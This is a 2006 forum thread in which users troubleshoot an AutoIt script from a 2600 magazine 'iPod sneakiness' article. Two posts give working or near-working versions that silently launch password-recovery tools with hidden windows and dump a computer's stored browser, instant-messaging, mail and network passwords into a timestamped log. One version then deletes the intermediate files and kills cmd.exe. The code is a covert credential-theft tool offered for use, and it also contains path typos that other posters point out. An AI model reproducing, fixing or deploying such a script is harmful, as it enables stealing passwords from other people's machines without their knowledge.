drumeugene Posted May 19, 2006 Share Posted May 19, 2006 hello, has anyone gotten the autoit code from the newest 2600 mag to work for the ipod sneakiness article? i cant seem to get it to work. Link to comment Share on other sites More sharing options...
AntBriWes Posted May 25, 2006 Share Posted May 25, 2006 Well, 48 hours ago I had never read 2600 or had ANY experience whatsoever with this script. A friend of mine just bought the issue of 2600 with that code in it and I found it intriguing. After a few downloads I had all I needed.....then I found the code had problems. I set on learning how to fix it myself. Now, approximately 40 hours after seeing the article I have found the problems and am working the script perfectly well, my persistance paid off. Well, enough rambling, here's the code. As you may notice I had to change the sleep times. That was merely because my processor is WAY too slow. Feel free to mess with the sleep times yourselves, good luck. Run(@ComSpec & ' /k "..\\Password\\Software\\pspv.exe /stext ..\\Password\\new\\pspv.txt"', @ScriptDir, @SW_HIDE) sleep(200) Run(@ComSpec & ' /k "..\\Password\\Sofware\\im.exe /stext ..\\Password\\new\\im.txt"', @ScriptDir, @SW_HIDE) sleep(200) Run(@ComSpec & ' /k "..\\Password\\Sofware\\mail.exe /stext ..\\Password\\new\\mail.txt"', @ScriptDir, @SW_HIDE) sleep(200) Run(@ComSpec & ' /k "..\\Password\\Sofware\\network.exe /stext ..\\Password\\new\\network.txt"', @ScriptDir, @SW_HIDE) sleep(3000) Run(@ComSpec & ' /k "COPY ..\\Password\\new\\*.txt ..\\Password\\new\\all.txt"', @ScriptDir, @SW_HIDE) sleep(3000) Dim $DateTime = @YEAR & "-" & @MON & "-" & @MDAY & "-" & @HOUR & "-" & @MIN & "_" & @SEC Dim $Location = @WorkingDir & '\\new\\' Dim $FileName = "all.txt" FileMove($Location & $FileName , $Location & $DateTime & ".log",1) sleep(3000) Run(@ComSpec & ' /k "del ..\\Password\\new\\*.txt"', @ScriptDir, @SW_HIDE) sleep(1000) Link to comment Share on other sites More sharing options...
Nunim Posted May 27, 2006 Share Posted May 27, 2006 I tried their original code and it didn't work well for me but either did yours. Is /k refering to the drive letter? And in your code, Software changes to Sofware in later lines. I am getting this error: Error 3: The system cannot find path specified, is this because of your double slashes? Thanks. Link to comment Share on other sites More sharing options...
MikeS Posted July 4, 2006 Share Posted July 4, 2006 (edited) Hello, Can someone help me with this script. I can not get it to write the txt files to the lof file. Here is the code for the project ;Working without writing log file Run(@ComSpec & ' /k "pspv.exe /stext ..\\take\pspv.txt"', @ScriptDir, @SW_HIDE) sleep(200) Run(@ComSpec & ' /k "IM.exe /stext ..\\take\mspass.txt"', @ScriptDir, @SW_HIDE) sleep(200) Run(@ComSpec & ' /k "mail.exe /stext ..\\take\mailpv.txt"', @ScriptDir, @SW_HIDE) sleep(200) Run(@ComSpec & ' /k "network.exe /stext ..\\take\netpass.txt"', @ScriptDir, @SW_HIDE) sleep(3000) Run(@ComSpec & ' /k "COPY .\\take\*.txt ..\\take\all.txt"', @ScriptDir, @SW_HIDE) sleep(3000) Dim $DateTime, $Location, $FileName $DateTime = @YEAR & "-" & @MON & "-" & @MDAY & "-" & @HOUR & "-" & @MIN & "_" & @SEC $Location = @WorkingDir & '..\\take\' $FileName = "all.txt" FileMove($Location & $FileName , $Location & $DateTime & ".log",1) sleep(3000) ;Run(@ComSpec & ' /k "del ..\\take\*.txt"', @ScriptDir, @SW_HIDE) ;sleep(1000) Run(@ComSpec & ' /k "process.exe -k cmd.exe"', @ScriptDir, @SW_HIDE) Thanks, Mike Edited July 4, 2006 by MikeS Link to comment Share on other sites More sharing options...
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